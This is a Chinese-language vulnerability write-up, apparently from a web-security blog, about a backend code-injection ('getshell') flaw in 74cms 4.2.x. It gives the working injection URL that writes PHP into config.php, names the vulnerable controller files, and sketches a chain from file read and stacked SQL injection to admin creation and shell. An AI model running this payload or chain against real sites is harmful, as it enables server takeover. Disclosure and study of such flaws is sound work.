74cms v4.2.1-v4.2.129 后台 getshell 漏洞

发布于 2024-07-15 12:51:09 字数 1868 浏览 21 评论 0

0x00 前言

厂商:74cms 下载地址: http://www.74cms.com/download/index.html 关于版本:新版的 74cms 采用了 tp3.2.3 重构了,所以可知底层是 tp,74cms 新版升级是后台升级的,所以先将将升级方法。注:此漏洞不用升级至最新版本也可使用。

0x01 74cms 升级到最新版

  1.  先去官网下载 骑士人才系统基础版(安装包)
  2. 将下载好的包进行安装
  3. 进入后台点击查看如果不是最新版的话,请点击升级!
  4.  如果是本地环境的话,会提示 域名不合法升级失败,这个问题很好解决
  5. 搜索文件 74cms\upload\Application\Admin\Controller\ApplyController.class.php6 ​, 查找所有 $_SERVER[\'HTTP_HOST\'] ​改为 http://baidu.com 即可

0x02 漏洞演示

url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'

shell:http://74cms.test/Application/Home/Conf/config.php
路径:\74cms\upload\Application\Home\Conf\config.php

0x03 漏洞原理

url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'
路径:74cms\upload\Application\Admin\Controller\TplController.class.php

路径: 74cms\upload\Application\Common\Controller\BackendController.class.php

0x04 题外话-认真版 getshell 方法

认真版 getshell 方法:实际上想要进行 getshell 利用组合漏洞是很简单的事情。我的前台日到后台的 getshell 方法是这样的。首先 利用-任意文件读取漏洞-读取系统中的 hash 值然后在通过漏洞-前台 sql 注入-来插入用户数据-因为我发现他可以支持执行双语句所以可以执行 mysql 双语句插入一条管理员用户在通过这个后台 getshell 漏洞即可完成一套日穿

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

0 文章
0 评论
23 人气
更多

推荐作者

謌踐踏愛綪

文章 0 评论 0

开始看清了

文章 0 评论 0

高速公鹿

文章 0 评论 0

alipaysp_PLnULTzf66

文章 0 评论 0

热情消退

文章 0 评论 0

白色月光

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文